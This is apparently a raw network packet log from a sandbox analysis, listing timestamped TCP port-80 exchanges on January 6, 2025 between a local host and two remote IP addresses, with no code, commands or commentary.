                                                                                                                                          Jan 6, 2025 07:54:03.322496891 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.322508097 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.322518110 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.322531939 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.322542906 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.322551966 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.322556973 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.322637081 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.359833002 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359846115 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359863997 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359874964 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359890938 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359901905 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359911919 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359922886 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.359935999 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.359989882 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360019922 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360061884 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360071898 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360081911 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360091925 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360102892 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360121965 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360152006 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360168934 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360188961 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360213995 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360224962 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360241890 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360249996 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360271931 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360317945 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360357046 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360368967 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360410929 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360421896 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360440016 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360541105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360552073 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360574007 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360578060 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360589981 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360599995 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360604048 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360747099 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360789061 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360800982 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360810995 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360826969 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360838890 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360848904 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360851049 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360861063 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360871077 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360878944 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360878944 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360882998 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.360909939 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.360955000 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.361110926 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.361121893 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448090076 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448097944 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.448107004 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448118925 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448137045 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.448182106 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448189974 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.448194027 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448205948 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.448263884 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.490317106 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490334988 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490353107 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490364075 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490376949 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490401983 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.490439892 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490451097 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490463972 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.490469933 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.490502119 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.490592957 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.494710922 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494736910 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494746923 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494759083 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494844913 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494846106 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.494863033 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494873047 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.494875908 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494908094 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494925976 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494936943 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.494940042 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.494946957 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.494975090 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.494990110 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495002031 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495012045 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495038986 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495412111 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495424032 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495435953 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495454073 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495464087 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495481014 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495481968 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495491982 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495503902 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495512962 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495573044 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495594025 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495604992 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495615959 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495626926 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495637894 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495656013 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495663881 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495667934 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495677948 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495687008 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495690107 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495702028 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.495712996 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.495722055 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.496057987 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496069908 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496078968 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496089935 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496099949 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496110916 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496119022 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.496123075 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496139050 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.496145964 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496157885 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:03.496175051 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:03.496366024 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:04.470927000 CET4971280192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.475754023 CET8049712166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:04.475836992 CET4971280192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.476211071 CET4971280192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.481086016 CET8049712166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:04.481141090 CET4971280192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.508980036 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.513762951 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:04.513849974 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.514368057 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:04.521164894 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433335066 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433360100 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433372974 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433382988 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433396101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433404922 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433423996 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.433561087 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.433660030 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433671951 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433685064 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433696032 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.433753014 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.433753014 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.438313007 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.438327074 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.438340902 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.438352108 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.438539982 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.657927036 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.657939911 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658036947 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.658051968 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658066034 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658078909 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658092022 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658111095 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.658176899 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.658652067 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658667088 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658678055 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.658730984 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.658962965 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659008980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659018993 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659032106 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659040928 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.659085989 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.659584999 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659596920 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659603119 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659641981 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659652948 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659663916 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:05.659672022 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:05.659698009 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.112396955 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112406969 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112416029 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.112418890 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112442017 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112451077 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.112454891 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112466097 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112477064 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.112478018 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112489939 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112500906 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112508059 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.112514019 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.112535954 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.112581015 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.113120079 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113137960 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113149881 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113159895 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113171101 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.113172054 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113183975 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113198042 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.113214016 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.113230944 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.113253117 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.130507946 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.198734045 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198755980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198767900 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198807001 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.198826075 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198838949 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198851109 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198878050 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.198931932 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.198988914 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.198999882 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199011087 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199023008 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199033022 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199044943 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199045897 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.199057102 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199068069 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199079990 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.199083090 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.199107885 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.248100042 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.331815004 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.331835032 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.331849098 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.331885099 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.331921101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.331933022 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.331944942 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.331974983 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332005024 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332072020 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332082987 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332119942 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332170010 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332181931 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332197905 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332227945 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332250118 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332262039 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332273006 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332283974 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332293034 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332298040 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332298994 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332312107 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332319021 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332360983 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332380056 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332393885 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332403898 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332416058 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332426071 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332453966 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332473040 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332485914 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332523108 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332540035 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332556009 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332566977 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332577944 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332607031 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332623005 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332634926 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332639933 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332660913 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332670927 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332673073 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332689047 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332701921 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332712889 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332724094 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332724094 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332752943 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332752943 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332787037 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332798958 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332811117 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332837105 CET8049713166.62.27.188192.168.2.5
